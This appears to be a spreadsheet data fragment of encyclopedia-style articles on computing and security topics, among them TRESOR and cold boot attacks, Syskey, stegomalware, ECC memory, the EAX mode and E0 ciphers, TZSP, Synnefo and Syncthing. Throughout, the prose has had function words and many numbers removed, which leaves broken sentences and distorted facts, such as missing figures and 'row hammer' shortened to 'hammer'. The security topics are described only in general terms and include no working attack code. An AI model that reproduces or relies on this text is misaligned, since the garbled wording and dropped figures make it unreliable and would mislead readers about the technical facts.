data—for example system locked, booby traps intrusion controls, needed guaranteed untouched form forensic evidentiary purposes. since physical property hardware itself, based physical properties memory devices, cannot defeated easily pure software techniques, since software running memory point intervention becomes accessible. result, encryption software whose keys could accessed vulnerable attacks. usually cold boot attack involves cooling memory chips quickly restarting computer, exploiting fact data immediately lost lost power quickly restored) data held point intervention left accessible examination. cold boot attacks therefore means unauthorized data theft, loss access. such attacks nullified encryption keys accessible hardware level intruder–i.e., devices keys stored amenable cold boot attacks–but usual case. tresor's approach tresor software approach seeks resolve insecurity storing manipulating encryption keys almost exclusively alone, registers accessible ring (the highest privilege level) only—the exception brief period initial calculation start session. this ensures encryption keys almost never available userspace code following cold boot attack. tresor written patch kernel stores encryption keys debug registers, uses on-the-fly round generation, atomicity, blocking usual ptrace access debug registers security. tresor foreshadowed 2010 thesis tilo muller analyzed cold boot attack issue. concluded modern processors register areas cpu-based kernel encryption realistic: registers could effect made privileged disabling instructions (and necessarily, programs relying them), debug registers much smaller issues. left latter others examine, developed proof concept distribution called paranoix based register method.its developers state "running tresor 64-bit supports aes-ni, performance penalty compared generic implementation aes", slightly faster standard encryption despite need recalculation, result initially surprised authors well. potential vulnerabilities authors' paper notes following: although cannot rule data leaking ram, unable observe case happened formal testing. case expected patchable. root access encryption keys kernel running system possible using loadable kernel modules virtual memory (/dev/kmem) physical memory (/dev/mem), compiled support these, otherwise appears accessible known standard running system. acpi sleep power states: real processors registers reset zero acpi states (suspend-to-ram) (suspend-to-disk) states since switched these. cold boot attacks cpu: real processors registers cleared zero hardware resets software resets ("ctrl-alt-delete"). however registers currently vulnerable virtual machines, since reset simulated hardware resets software resets. authors deem apparent flaw many implementations virtual machines, note virtual systems would inherently vulnerable even rectified, since registers virtual machine likely accessible using host system. tresor resistant timing attacks cache-based attacks design aes-ni instruction, supports instruction extensions. processors capable handling extensions 2011 intel westmere sandy bridge (some excepted) successors, bulldozer, certain padlock processors. 2012 paper called tresor-hunt showed attack could break system, injecting code would invisibly function ring (the highest privilege level), bypassing "lockout" imposed tresor, would allow read keys debug registers transfer usual memory. paper also proposed ways mitigate attacks. also disk encryption secure design references notes external links tresor home page</t>
  </si>
  <si>
    <t>Syntax error</t>
  </si>
  <si>
    <t>computer science, syntax error error syntax sequence characters tokens intended written particular programming language. compiled languages, syntax errors detected compile-time. program compile syntax errors corrected. interpreted languages, however, syntax error detected program execution, interpreter's error messages might differentiate syntax errors errors kinds. there disagreement errors "syntax errors". example, would uninitialized variable's value java code syntax error, many others would disagree would classify (static) semantic error. 8-bit home computers used basic interpreter primary user interface, syntax error error message became somewhat notorious, response command user input interpreter could parse. syntax error occur take place, invalid equation typed calculator. this caused, instance, opening brackets without closing them, less commonly, entering several decimal points number. java following syntactically correct statement: following not: system.out.println(hello world);the second example would theoretically print variable hello world instead words "hello world". however, variable java cannot space between, syntactically correct line would system.out.println(hello_world). compiler flag syntax error given source code meet requirements language's grammar. type errors (such attempt apply increment operator boolean variable java) undeclared variable errors sometimes considered syntax errors detected compile-time. however, common classify errors (static) semantic errors instead. syntax errors calculators syntax error several types errors calculators (most commonly found scientific calculators graphing calculators), representing equation input incorrect syntax numbers, operations result various ways, including limited open bracket without closing parenthesis (unless missing closing parenthesis equation) using minus sign instead negative symbol vice versa), distinct scientific calculators. note scientific calculators allow minus sign stand negative symbol, reverse less common. also soup references</t>
  </si>
  <si>
    <t>Synnefo</t>
  </si>
  <si>
    <t>synnefo complete open-source cloud stack written python provides compute, network, image, volume storage services, similar ones offered aws. synnefo manages multiple google ganeti clusters backend handle low-level operations uses archipelago unify cloud storage. boost 3rd-party compatibility, synnefo exposes openstack apis users. synnefo developed grnet (greek research technology network), powering public cloud services, ~okeanos service, aimed towards greek academic community, ~okeanos global service, open members géant network. history november 2006, effort provide advanced cloud services greek academic research community, grnet decides launch cloud storage service, similar amazon's called pithos. project outsourced opens public beta members greek academic research community 2009.in june 2010, grnet decides next step course; create complete, aws-like cloud service (compute/network/volume/image/storage). this service, called ~okeanos, aims provide greek academic research community access virtualized infrastructure various projects take advantage e.g. experiments, simulations labs. given non-ephemeral nature resources service provides, need arises persistent cloud servers. search solution, october 2010 grnet decides base service google ganeti design implement missing parts in-house. 2011, older pithos service rewritten scratch in-house, intention integrated ~okeanos storage service. moreover, pithos adds support dropbox-like syncing. july 2011, ~okeanos reaches public alpha stage. this version (v0.5.2.1) includes identity, compute, network primitive image service. alpha release new, rewritten pithos follows shortly after, november 2011. marketed pithos+ pithos remains separate service. pithos+, though integrated ~okeanos yet, provides syncing sharing capabilities files, well native syncing clients iphone, ipad windows. march 2012, ~okeanos enters public alpha2 phase. this version (v0.9) includes complete integration pithos part ~okeanos acts unified store images files. around point, april 2012, ~okeanos team decides refer whole software stack synnefo starts writing first version synnefo documentation. december 2012, interest parties synnefo stack, grnet decides conceptually separate ~okeanos synnefo projects. synnefo starts become branding-neutral, iaas cloud computing software, ~okeanos becomes real-world application, iaas greek academic research community. april 2013, synnefo version (v.013) gets released huge cleanup code refactoring. separate components merged single synnefo repository. this first release unified project, containing parts (compute/network/volume/image/storage). 2013, synnefo v0.14 gets released. since version, synnefo branding neutral (all remaining ~okeanos references removed). also gets branding mechanism corresponding documentation, others adapt branding identity. overview synnefo designed deployed environment components synnefo modular nature consists following components: astakos (identity/account services) astakos identity management component provides common user base rest synnefo. astakos handles user creation, user groups, resource accounting, quotas, projects, issues authentication tokens used across infrastructure. supports multiple authentication methods: pithos (file/object storage services) pithos object/file storage component synnefo. users upload files pithos using either command-line client, native syncing clients. thin layer mapping user-files content-addressable blocks stored storage backend. files split blocks fixed size, hashed independently create unique identifier block, file represented sequence block names hashmap). this way, pithos provides deduplication file data; blocks shared among files stored once. current implementation uses blocks hashed sha256. content-based addressing also enables efficient two-way file syncing used pithos clients (e.g. kamaki command-line client native windows/mac clients). whenever someone wishes upload updated version file, client hashes blocks file requests server create version block sequence. server return error reply list missing blocks. client upload block one, retry file creation. similarly, whenever file changed server, client list blocks download modified ones. pithos runs cloud layer exposes openstack object storage outside world, custom extensions syncing. client speaking openstack swift also used store objects pithos deployment. process mapping user files hashed objects independent actual storage backend, selectable administrator using pluggable drivers. currently, pithos drivers storage backends: files shared filesystem, e.g., nfs, lustre, gpfs glusterfs objects ceph/rados cluster.whatever storage backend, responsible storing objects reliably, without connection cloud apis hashing operations. cyclades (compute/network/image/volume services) cyclades synnefo component implements compute, network, image volume services. exposes associated openstack rest apis: openstack compute, network, glance soon also cinder. cyclades part manages multiple ganeti clusters backend. cyclades issues commands ganeti cluster using ganeti's remote (rapi). administrator expand infrastructure dynamically adding ganeti clusters reach datacenter scale. cyclades knows nothing low-level management operations, e.g., handling creations, migrations among physical nodes, handling node downtimes; design implementation end-user orthogonal handling backend. there distinct, asynchronous paths interaction synnefo ganeti. effect path activated response user request; cyclades issues control commands ganeti rapi. update path triggered whenever state changes, synnefo- administrator-initiated actions happening ganeti level. update path, monitor ganeti's queue produce notifications rest synnefo infrastructure message queue. users full control vms: create ones, start them, shutdown, reboot, destroy them. configuration select number cpus, size system disk, operating system pre-defined images including popular linux distros (debian, ubuntu, centos, fedora, gentoo, archlinux, opensuse), ms-windows server 2008 2012 well freebsd. rest management, openstack compatible, interoperate party tools client libraries. cyclades written javascript/jquery runs entirely client side maximum responsiveness. another client; operations happen asynchronous calls api. networking functionality includes dual ipv4/ipv6 connectivity easy, platform-provided firewalling either array pre-configured firewall profiles, roll-your-own firewall inside users create multiple private, virtual networks, construct arbitrary network topologie, e.g., deploy multi-tier configurations. networking functionality exported backend also openstack ganeti references external links official website ~okeanos website ~okeanos global website</t>
  </si>
  <si>
    <t>Syskey</t>
  </si>
  <si>
    <t>lock tool, better known syskey (the name executable file), discontinued component windows encrypts security account manager (sam) database using 128-bit encryption key.first introduced q143475 hotfix included windows sp3, removed windows 10's fall creators update 2017 cryptography considered unsecure modern standards, part scams form ransomware. microsoft officially recommended bitlocker disk encryption alternative. history first introduced q143475 hotfix included windows sp3, syskey intended protect offline password cracking attacks preventing possessor unauthorized copy file extracting useful information it.syskey optionally configured require user enter boot startup password) load onto removable storage media (e.g., floppy disk flash drive).in mid-2017, microsoft removed syskey.exe future versions windows. microsoft recommends "bitlocker similar technologies instead syskey.exe utility." security issues "syskey bug" december 1999, security team bindview found security hole syskey indicated certain form offline cryptanalytic attack possible, making brute force attack appear possible. problem syskey keystream reuse problems. microsoft later issued problem (dubbed "syskey bug"). affected windows pre-rc3 versions windows 2000. ransomware syskey commonly abused "tech support" scammers lock victims computers, order coerce paying ransom. also hash pwdump references</t>
  </si>
  <si>
    <t>Stegomalware</t>
  </si>
  <si>
    <t>stegomalware type malware uses steganography hinder detection. steganography practice concealing file, message, image, video within another file, message, image, video network traffic. this type malware operates building steganographic system hide malicious data within resources extracts executes dynamically. considered sophisticated stealthy ways obfuscation. term `stegomalware' introduced researchers context mobile malware presented inscrypt conference 2014. however, fact (mobile) malware could potentially utilize steganography already presented earlier works: steganography malware first applied botnets communicating probabilistically unobservable channels, mobile malware based covert channels proposed year. steganography later applied components malware engineering return-oriented programming compile-time obfuscation, among others.the europol-supported cuing initiative monitors steganography malware. references</t>
  </si>
  <si>
    <t>ECC memory</t>
  </si>
  <si>
    <t>error correction code memory (ecc memory) type computer data storage uses error correction code (ecc) detect correct n-bit data corruption occurs memory. memory used computers data corruption cannot tolerated, like industrial control applications, critical databases, infrastructural memory caches. typically, memory maintains memory system immune single-bit errors: data read word always data written even bits actually stored flipped wrong state. most non-ecc memory cannot detect errors, although non-ecc memory parity support allows detection correction. description error correction codes protect undetected data corruption used computers corruption unacceptable, examples scientific financial computing applications, database file servers. also reduce number crashes multi-user server applications maximum-availability systems. electrical magnetic interference inside computer system cause single dynamic random-access memory (dram) spontaneously flip opposite state. initially thought mainly alpha particles emitted contaminants chip packaging material, research shown majority one-off soft errors dram chips occur result background radiation, chiefly neutrons cosmic secondaries, change contents memory cells interfere circuitry used read write them. hence, error rates increase rapidly rising altitude; example, compared level, rate neutron flux times higher times higher 10-12 (the cruising altitude commercial airplanes). result, systems operating high altitudes require special provisions reliability. example, spacecraft cassini–huygens, launched 1997, contained identical flight recorders, gigabits memory form arrays commercial dram chips. built-in edac functionality, spacecraft's engineering telemetry reported number (correctable) single-bit-per-word errors (uncorrectable) double-bit-per-word errors. during first years flight, spacecraft reported nearly constant single-bit error rate errors day. however, november 1997, first month space, number errors increased factor four single day. this attributed solar particle event detected satellite goes 9.there concern dram density increases further, thus components chips smaller, operating voltages continue fall, dram chips affected radiation frequently, since lower-energy particles able change memory cell's state. hand, smaller cells make smaller targets, moves technologies make individual cells less susceptible counteract, even reverse, trend. recent studies show single-event upsets cosmic radiation dropping dramatically process geometry previous concerns increasing cell error rates unfounded. research work published 2007 2009 showed widely varying error rates orders magnitude difference, ranging 10−10 error/bit·h (roughly error hour gigabyte memory) 10−17 error/bit·h (roughly error millennium gigabyte memory). large-scale study based google's large number servers presented sigmetrics/performance conference. actual error rate found several orders magnitude higher previous small-scale laboratory studies, 25,000 (2.5 10−11 error/bit·h) 70,000 (7.0 10−11 error/bit·h, error gigabyte hours) errors billion device hours megabit. more dimm memory modules affected errors year. consequence memory error system-dependent. systems without ecc, error lead either crash corruption data; large-scale production sites, memory errors most-common hardware causes machine crashes. memory errors cause security vulnerabilities. memory error consequences changes neither causes observable malfunctioning affects data used calculations saved. 2010 simulation study showed that, browser, small fraction memory errors caused data corruption, although, many memory errors intermittent correlated, effects memory errors greater would expected independent soft errors.some tests conclude isolation dram memory cells circumvented unintended side effects specially crafted accesses adjacent cells. thus, accessing data stored dram causes memory cells leak charges interact electrically, result high cell density modern memory, altering content nearby memory rows actually addressed original memory access. this effect known hammer, also used privilege escalation computer security exploits.an example single-bit error would ignored system error-checking, would halt machine parity checking, would invisibly corrected ecc: single stuck faulty chip, becomes changed background cosmic radiation; spreadsheet storing numbers ascii format loaded, character (decimal value ascii encoding) stored byte contains stuck lowest position; then, change made spreadsheet saved. result, (0011 1000 binary) silently become (0011 1001). solutions several approaches developed deal unwanted bit-flips, including immunity-aware programming, parity memory, memory. this problem mitigated using dram modules include extra memory bits memory controllers exploit bits. these extra bits used record parity error-correcting code (ecc). parity allows detection single-bit errors (actually, number wrong bits). most-common error correcting code, single-error correction double-error detection (secded) hamming code, allows single-bit error corrected usual configuration, extra parity bit) double-bit errors detected. chipkill effective version also corrects multiple errors, including loss entire memory chip. implementations seymour cray famously said "parity farmers" asked left 6600. later, included parity 7600, caused pundits remark "apparently farmers computers". original early 1990s used parity checking. later ones mostly not. ecc-capable memory controller generally detect correct errors single word (the unit transfer), detect (but correct) errors bits word. bios computers, matched operating systems versions linux, bsd, windows (windows 2000 later), allows counting detected corrected memory errors, part help identify failing memory modules problem becomes catastrophic. some dram chips include "internal" on-chip error correction circuits, allow systems non-ecc memory controllers still gain benefits memory. systems, similar effect achieved using memory modules. error detection correction depends expectation kinds errors occur. implicitly, assumed failure word memory independent, resulting improbability simultaneous errors. this used case memory chips one-bit wide, typical first half 1980s; later developments moved many bits chip. this weakness addressed various technologies, including ibm's chipkill, microsystems' extended ecc, hewlett packard's chipspare, intel's single device data correction (sddc). dram memory provide increased protection soft errors relying error correcting codes. such error-correcting memory, known edac-protected memory, particularly desirable high fault-tolerant applications, servers, well deep-space applications increased radiation. some systems also "scrub" memory, periodically reading addresses writing back corrected versions necessary remove soft errors. interleaving allows distribution effect single cosmic ray, potentially upsetting multiple physically neighboring bits across multiple words associating neighboring bits different words. long single event upset (seu) exceed error threshold (e.g., single error) particular word accesses, corrected (e.g., single-bit error correcting code), effectively error-free memory system maintained.error-correcting memory controllers traditionally hamming codes, although triple modular redundancy (tmr). latter preferred hardware faster hamming error correction scheme. space satellite systems often tmr, although satellite usually uses hamming error correction.many early implementations memory mask correctable errors, acting error never occurred, report uncorrectable errors. modern implementations correctable errors (ce) uncorrectable errors (ue). some people proactively replace memory modules exhibit high error rates, order reduce likelihood uncorrectable error events.many memory systems "external" edac circuit memory. systems memory internal external edac systems; external edac system designed correct certain errors internal edac system unable correct. modern desktop server cpus integrate edac circuit cpu, even shift toward cpu-integrated memory controllers, related numa architecture. integration enables zero-penalty edac system error-free operation. 2009, most-common error-correction codes hamming hsiao codes provide single-bit error correction double-bit error detection (sec-ded). other error-correction codes proposed protecting memory double-bit error correcting triple-bit error detecting (dec-ted) codes, single-nibble error correcting double-nibble error detecting (snc-dnd) codes, reed–solomon error correction codes, etc. however, practice, multi-bit correction usually implemented interleaving multiple sec-ded codes.early research attempted minimize area delay overheads circuits. hamming first demonstrated sec-ded codes possible particular check matrix. hsiao showed alternative matrix weight columns provides sec-ded capability less hardware area shorter delay traditional hamming sec-ded codes. more recent research also attempts minimize power addition minimizing area delay. cache many cpus error-correction codes on-chip cache, including intel itanium, xeon, core pentium (since microarchitecture) processors, athlon, opteron, zen- zen+-based processors (epyc, epyc embedded, ryzen ryzen threadripper), alpha 21264.as 2006, edc/ecc ecc/ecc most-common cache error-protection techniques used commercial microprocessors. edc/ecc technique uses error-detecting code (edc) level cache. error detected, data recovered ecc-protected level cache. ecc/ecc technique uses ecc-protected level cache ecc-protected level cache. cpus edc/ecc technique always write-through stores level cache, error detected read level data cache, copy data recovered level cache. registered memory registered, buffered, memory ecc; technologies perform different functions. usual memory used servers registered, allow many memory modules used without electrical problems, ecc, data integrity. memory used desktop computers neither, economy. however, unbuffered (not-registered) memory available, non-server motherboards support functionality modules used supports ecc. registered memory work reliably motherboards without buffering circuitry, vice versa. advantages disadvantages ultimately, trade-off protection unusual loss data higher cost. memory usually involves higher price compared non-ecc memory, additional hardware required producing memory modules, lower production volumes memory associated system hardware. motherboards, chipsets processors support also expensive. support varies among motherboard manufacturers memory simply recognized ecc-incompatible motherboard. most motherboards processors less critical applications designed support prices kept lower. some ecc-enabled boards processors able support unbuffered (unregistered) ecc, also work non-ecc memory; system firmware enables functionality memory installed. lower memory performance around percent systems, depending application implementation, additional time needed memory controllers perform error checking. however, modern systems integrate testing cpu, generating additional delay memory accesses long errors detected.ecc supporting memory contribute additional power consumption error correcting circuitry. notes references external links softecc: system software memory integrity checking tunable, software-based dram error detection correction library detection correction silent data corruption large-scale high-performance computing single-bit errors: memory module supplier's perspective cause, impact detection intel xeon processor 1200 product family memory configuration guide linus torvalds importance ram, calls intel's "bad policies" over</t>
  </si>
  <si>
    <t>EAX mode</t>
  </si>
  <si>
    <t>mode (encrypt-then-authenticate-then-translate) mode operation cryptographic block ciphers. authenticated encryption associated data (aead) algorithm designed simultaneously provide authentication privacy message (authenticated encryption) two-pass scheme, pass achieving privacy authenticity block. mode submitted october 2003 attention nist order replace standard aead mode operation, since mode lacks desirable attributes complex. encryption authentication flexible nonce-using two-pass aead scheme restrictions block cipher primitive used, block size, supports arbitrary-length messages. authentication length arbitrarily sizeable used cipher's block size. block cipher primitive used mode encryption omac authentication block composition method, seen particular case general algorithm called eax2 described mode operationthe reference implementation aforementioned paper uses mode encryption combined omac authentication. performance being two-pass scheme, mode slower well designed one-pass scheme based primitives. mode several desirable attributes, notably: provable security (dependent security underlying primitive cipher); message expansion minimal, limited overhead length; using mode means cipher need implemented encryption, simplifying implementation ciphers (especially desirable attribute hardware implementation); algorithm "on-line", means process stream data, using constant memory, without knowing total data length advance; algorithm pre-process static associated data (ad), useful encryption/decryption communication session parameters (where session parameters represent associated data).notably, mode lacks last attributes (ccm process associated data, can't pre-process it). patent status authors mode, mihir bellare, phillip rogaway, david wagner placed work public domain stated unaware patents covering technology. thus, mode operation believed free unencumbered use. modification mode, called eax′ eaxprime, used ansi c12.22 standard transport meter-based data network. 2012 kazuhiko minematsu, stefan lucks, hiraku morita tetsu iwata published paper proves security mode messages longer key, demonstrates trivial attack short messages using mode. possible create vulnerable short messages compliant ansi c12.22 standard, contexts short messages possible, eaxprime cannot securely used. also authenticated encryption associated data (aead) authenticated encryption (ae) mode mode omac references external links nist: block cipher modes critique (february 2003) software implementations c++: brian gladman's crypto library implementing mode operation pascal delphi: wolfgang ehrhardt's crypto library implementing mode operation java: bouncycastle crypto library implementing mode operation libtomcrypt implementing mode operation hardware implementations</t>
  </si>
  <si>
    <t>Synchronize It</t>
  </si>
  <si>
    <t>synchronize file synchronization software allows users compare synchronize folders stored computer, different computers, archives sites. various synchronization modes (actions) comparison rules available. features folders comparison common application synchronize compare folders source folder target folder. users choose whether subfolders included (allowing exclusion specific subfolders), whether matching folders compared users apply file filters. various actions comparison modes available (see below). custom sessions saved organized projects. compare folder archive archives supported internally external archivers used support archive types. archives support allows users create backup archives folders; compare folders content archived version update compare synchronize archives other. command line switches synchronize also started configured command line. this allows automation implementation tools, total commander. synchronize non-connected package feature used synchronize distant, non-connected pcs. list files contained source folder stored small package file, kept stick. package synchronized target folder another computer. files present modified target computer packed package. package hence contains files different entire folder, makes tool keep non-connected computers synchronized (e.g. work home). reporting printing results form comparison printed exported published html reports. portability synchronize also works without installation size. directly stick. actions following actions synchronization modes available: comparison rules date comparison rules takes account global time-related options, ignore secs difference etc. also file synchronization comparison file synchronization software windows live foldershare synctoy beyond compare goodsync references stone, adam (2005-01-20). "synchronize synch time flat efficient, painless synching your service". winplanet software reviews. retrieved 2009-07-01. "synchronize it!". diff utils reviews comparison software. 2006-12-17. retrieved 2009-07-01. external links official website developer development blog support forum article implement synchronize total commander</t>
  </si>
  <si>
    <t>E0 (cipher)</t>
  </si>
  <si>
    <t>stream cipher used bluetooth protocol. generates sequence pseudorandom numbers combines data using operator. length vary, generally bits. description iteration, generates using four shift registers differing lengths (25, bits) internal states, bits long. clock tick, registers shifted states updated current state, previous state values shift registers. four bits extracted shift registers added together. algorithm xors value 2-bit register. first result output encoding. divided three parts: payload generation keystream generation encodingthe setup initial state bluetooth uses structure random stream generator. thus dealing combined algorithms. initial 132-bit state produced first stage using four inputs (the 128-bit key, bluetooth address bits 26-bit master counter). output processed polynomial operation resulting goes second stage, generates stream used encoding. variable length, always multiple (between bits). keys generally used. these stored second stage's shift registers. pseudorandom bits produced clock ticks, last bits inserted shift registers. stream generator's initial state. cryptanalysis several attacks attempts cryptanalysis bluetooth protocol made, number vulnerabilities found. 1999, miia hermelin kaisa nyberg showed could broken operations (instead 2128), bits output known. this type attack subsequently improved kishan chand gupta palash sarkar. scott fluhrer, cisco systems employee, found theoretical attack operations precalculation search complexity operations. deduced maximal security equivalent provided 65-bit keys, longer keys improve security. fluhrer's attack improvement upon earlier work golic, bagini morgari, devised operations attack 2000, finn juha vainio showed problems related misuse generally, possible vulnerabilities bluetooth.in 2004, serge vaudenay published statistical attack requiring first bits bluetooth frames frame 2745 bits long). final complexity retrieve operations. attack improved operations precomputation actual search.in 2005, meier vaudenay published cryptanalysis based conditional correlation attack. their best result required first bits 223.8 frames computations recover key. authors assert "this clearly fastest practical known-plaintext attack bluetooth encryption compare existing attacks". also a5/1 references external links vaudenay, serge; "cryptanalysis (pdf). epfl. archived original (pdf) 2006-10-29. slides.</t>
  </si>
  <si>
    <t>TZSP</t>
  </si>
  <si>
    <t>tazmen sniffer protocol (tzsp) encapsulation protocol used wrap protocols. commonly used wrap 802.11 wireless packets support intrusion detection systems (ids), wireless tracking, wireless applications. protocol summary number 802.11 sensors access points tzsp protocol packet capture. open protocol designed encapsulate protocols udp. primary protocol capture wireless traffic transmission wired network. protocol header protocol specified three parts tzsp packet: 4-byte header followed tagged fields, last tag_end(0x01), finally encapsulated data. header tagged fields big-endian ordering appropriate. version tzsp version always (0x01). type (0x00) received list (0x01) packet transmit (0x02) reserved (0x03) configuration (0x04) keepalive (0x05) port opener encapsulated protocol (0x01) ethernet (0x12) ieee 802.11 (0x77) prism header (0x7f) wlan tagged fields tagged fields consist one-byte type, followed one-byte length, followed variable amount data. length include type length. tzsp compatible decoders skip unknown tagged fields. unsigned byte type unsigned byte length &lt;variable length dependent length there exceptions format. first, tag_end (0x01) received tagged fields. does length associated data. second tag_padding (0x00). this inserted point ignored. does length data. following valid tzsp types: tag_padding (0x00) this special tagged field neither length data. receiver ignore sometimes used pack frame word boundary. tag_end (0x01) this special tagged field neither length data. this means tags. following tag, packet, encapsulated frame. this required must included encapsulated data. variable tags follow one. tag_raw_rssi (0x0a) this field contains rssi obtained sensor. data either signed byte signed short. tag_snr (0x0b) this field contains noise obtained sensor. data either signed byte signed short. tag_data_rate (0x0c) this field contains data rate encapsulated packet transmitted following valid values used: (0x02) 1mb/s (0x04) 2mb/s (0x0b) 5.5mb/s (0x0c) 6mb/s (0x12) 9mb/s (0x16) 11mb/s (0x18) 12mb/s (0x24) 18mb/s (0x2c) 22mb/s (0x30) 24mb/s (0x42) 33mb/s (0x48) 36mb/s (0x60) 48mb/s (0x6c) 54mb/s following constants used prism-based sensors. tzsp decoder able decode used tzsp encoder: (0x0a) 1mb/s (0x14) 2mb/s (0x37) 5.5mb/s (0x6e) 11mb/s tag_timestamp (0x0d) this time sensor received packet. 4-byte unsigned int. tag_contention_free (0x0f) this used tell packet sent contention free period. 1-byte unsigned byte. tag_decrypted (0x10) this used tell packet decrypted. 1-byte unsigned byte. tag_fcs_error (0x11) this used tell packet frame check sequence (fcs) error reception. 1-byte unsigned byte. (0x01) specifies error decoding packet. zero (0x00), exclusion field means decoding error. values reserved. tag_rx_channel (0x12) this channel sensor captured packet. channel packet transmitted this stored unsigned byte. tag_packet_count (0x28) this monotonically increasing packet count. stored four byte unsigned int. tag_rx_frame_length (0x29) this received packet length. necessarily size transmitted packet, truncated. this stored byte unsigned short. tag_wlan_radio_hdr_serial (0x3c) this used sensor vendors specify serial number unique identifier sensor captured packet. this variable length field. encapsulated packet encapsulated packet stored immediately tagged fields. this encapsulated packet truncated original full packet size need size specified tag_rx_frame_length field. assumed encapsulated packet takes entire rest packet. open source support snort wireshark references external links archived documentation</t>
  </si>
  <si>
    <t>E (programming language)</t>
  </si>
  <si>
    <t>object-oriented programming language secure distributed computing, created mark miller, bornstein, douglas crockford, chip morningstar others electric communities 1997. mainly descended concurrent language joule original-e, extensions java secure distributed programming. combines message-based computation java-like syntax. concurrency model based event loops promises ensures deadlock never occur. philosophy language designed secure computing mind; accomplished chiefly strict adherence object-oriented computing model, pure form properties support secure computing. language standard library employ capability-based design philosophy throughout order help programmers build secure software enable software components co-operate even fully trust other. object references serve capabilities, hence capabilities computational conceptual overhead costs. language syntax designed easy people audit security flaws. example, lexical scoping limits amount code examined effects given variable. another example, language uses operator comparison operator assignment; avoid possibility confusion, operator. computational model values objects computation performed sending messages objects. each object belongs (analogous process). each single thread execution, stack frame, event queue. distributed programming matter sending messages remote objects (objects vats). communication remote parties encrypted runtime. arriving messages placed vat's event queue; vat's event loop processes incoming messages order arrival. ways sending messages: immediate call eventual send. immediate call like typical function method call non-concurrent language: sender waits receiver finishes returns value. eventual send sends message producing placeholder result called promise. sender proceeds immediately promise. later, receiver finishes yields result, promise resolves result. since eventual sends allowed communicating remote objects, deadlocks cannot happen. distributed systems, promise mechanism also minimizes delays caused network latency. syntax examples syntax similar java, though also bears resemblance python pascal. variables dynamically typed lexically scoped. unlike java python, however, composed entirely expressions. here extremely simple program: here recursive function computing factorial number, written functions defined using keyword. first line, :int guard constrains argument result function. guard quite thing type declaration; guards optional specify constraints. first :int ensures body function handle integer argument. without second :int above, function would able return value. being able front information escapes function helpful security auditing. since intended support secure co-operation, canonical example programs mint, simple electronic money system lines following code defines function makes mints, mint currency. each mint make purses hold currency, holder purses currency securely transfer money purses. quick examination source code, programmer easily verify mints change amount money circulation, money created destroyed, mints create money currency, holder purse change balance. objects defined keyword, within object definition, keyword begins method. guard expressions example illustrate specify value constraint :(int :(0..balance)). mint example makes built-in mechanism called sealer. function makebrandpair creates associated objects, sealer unsealer, sealer seal object unsealer object retrieve contents box. website detailed explanation money example. also object-capability model references external links official website</t>
  </si>
  <si>
    <t>Dynamips</t>
  </si>
  <si>
    <t>dynamips emulator computer program written emulate cisco routers. developed christophe fillot started working august 2005. dynamips runs freebsd, linux, windows. emulates hardware cisco series routing platforms directly booting actual cisco software image emulator. dynamips emulates cisco platforms 1700, 2600, 2691, 3600, 3725, 3745, 7200.although dynamips original development stalled since version 0.2.8-rc2, released october 2007, development continues efforts gns3 project volunteers; dynamips version 0.2.14-dev windows, linux, version 0.2.8-rc2 solaris. there add-ons written popular dynagen; front-end add-on allows configuration file provision dynamips emulator networks. another popular add-on gns3, graphical front dynamips dynagen. source code licensed gpl. purpose according creator, kind emulator useful: training platform software used real world. would allow people become familiar cisco devices. testing experimenting features cisco ios. quickly check configurations deployed later physical routers. resource utilization dynamips uses fair amount order accomplish emulation mips processor. intend image requires real 7200 router, devote virtual router instance, allocate working memory. dynamips also allocates default) ram/instance unix systems windows systems) cache translations. this total working size; default amount system’s actual used typically significantly less. this default dynamips uses memory-mapped files routers’ virtual memory. working directory, temporary “ram” files equal size virtual routers’ size. your naturally cache sections mmap files used.if plenty ram, know doing, “mmap false” device default router sections labs disable mmap instances. dynamips also uses cpu, emulating router’s instruction-by-instruction. initially knowing virtual router’s idle dutifully executes instructions make ios’s idle routines would execute instructions perform “real” work. “idle-pc” process given image, utilization decreases drastically. also packet tracer network simulation references external links updated dynamips source code dynamips community dynamips blog gns3 website http://dynamip-debian.blogspot.com/</t>
  </si>
  <si>
    <t>Syncthing</t>
  </si>
  <si>
    <t>syncthing free, open-source peer-to-peer file synchronization application available windows, macos, linux, android, solaris, darwin, bsd. sync files devices local network, remote devices internet. data security data safety built design software. technology syncthing written implements own, equally free block exchange protocol.syncthing cloud model users provide hardware software runs supports ipv6 and, ipv4 networks, punching relaying offered. devices connecting require explicit approval (unless using introducer feature) increases security mesh. data, whether transferred directly devices relays, encrypted using tls.conflicts handled older file renamed "sync-conflict" suffix (along time date stamp), enabling user decide manage files name changed synching. wrappers files present user method resolving conflicts without resort manual file handling. efficient synching achieved compression metadata transfer data, block re-use lightweight scanning changed files, full hash computed saved. syncthing offers send-only receive-only folder types updates remote devices processed, various types file versioning (trash can, simple staggered versioning well handing versioning external program script) file/path ignore patterns. different sha256 hashing implementations currently supported, faster used dynamically brief benchmark start-up. moving renaming files folders handled efficiently, syncthing intelligently processing operations rather re-downloading data scratch. infrastructure device discovery achieved publicly-accessible discovery servers hosted project developers, local (lan) discovery broadcast messages, device history static host name/addressing. project also provides syncthing discovery server program hosting one's discovery servers, used alongside, replacement public servers. network community-contributed relay servers allows devices behind different ipv4 firewalls able communicate relaying encrypted data third party. relaying performed similar nature turn protocol, traffic tls-encrypted end-to-end devices (thus even relay server cannot data, encrypted stream). private relays also configured, without public relays, desired. syncthing automatically switch relaying direct device-to-device connections discovers direct connection become available.syncthing used without connection project community's servers: upgrades, opt-in usage data, discovery relaying disabled and/or configured independently, thus mesh infrastructure closed system privacy confidentiality. configuration management syncthing must configured browser either locally remotely (and supports access proxy server), rest events apis community-contributed wrapper programs. links docker images also provided community contributions page, well links supported configuration management solutions puppet, ansible others. reception episode securitynow!, host steve gibson praised syncthing potential open-source replacement bittorrent sync, referenced episodes 603, 698, 727, detail episodes 781. reviewer writes "syncthing leaves favorable impression. developers seem done work create system capable, reliable, secure, performs reasonably well. also done work make easy make place free-software projects seem fall down. appealing tool anybody wanting take control data synchronization replication needs." history initial public binary release (v0.2) made december 2013.in october 2014 announced original author syncthing rebranded "pulse". however, november developer decided change syncthing pulse longer working ind.ie. ind.ie's pulse officially sanctioned fork syncthing.on april 2015, 0.11.0 released introduced conflict handling, language selection usage synching speed improvements, long filename support windows, automatic restarting problem example drive inaccessible, support external versioning software. 0.11 backwards compatible older versions syncthing. because changes rest syncthing clients 0.10.x automatically update 0.11 compatible party integrations time release.0.13.0 like many older releases syncthing incompatible clients running version 0.12.x below. 0.13.x separates folder folder labels. also ability serve parts file already downloaded clients still downloading.1.0.0, codenamed erbium earthworm, 